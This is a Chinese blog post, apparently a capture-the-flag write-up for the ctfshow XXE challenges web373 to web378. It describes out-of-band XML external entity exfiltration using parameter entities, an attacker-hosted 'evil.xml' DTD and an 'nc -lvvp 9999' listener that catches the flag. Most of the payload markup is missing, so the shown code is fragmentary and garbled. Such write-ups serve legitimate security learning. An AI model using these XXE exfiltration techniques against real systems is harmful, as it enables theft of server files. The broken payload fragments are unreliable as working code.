您当前的位置: 首页 > 

Z3eyOnd

暂无认证

  • 2浏览

    0关注

    117博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

XXE漏洞(ctfshow-xxe)

Z3eyOnd 发布时间:2021-10-29 23:43:36 ,浏览量:2

文章目录
    • XEE漏洞的原理
    • ctfshow-xxe
      • web373
      • web374,375,376
      • web377
      • web378

XEE漏洞的原理

XML外部实体注入

ctfshow-xxe web373

代码


DOCTYPE root-element [

//xxx表示自己服务器的ip地址
%dtd;
%send;
]>
123

evil.xml,需要与路径匹配

%payload;
//%号要进行实体编码成%

我解释一下,传入的xml,ip地址是自己evil.xml放入的文件地址

evil.xml其中的xxx就是自己服务器的IP地址,端口随便(只要开放端口都可以)

然后服务器监听,nc -lvvp 9999

这是服务器监听拿flag,我们还可以使用php文件

payload

# pd.dtd

%all;
//xxx表示自己服务器的ip地址
%dtd;
%send;
]>
123

evil.xml

%payload;
//%号要进行实体编码成%

xxe.php

# xxe.php

web377

代码

            
关注
打赏
1651657201
查看更多评论
0.0908s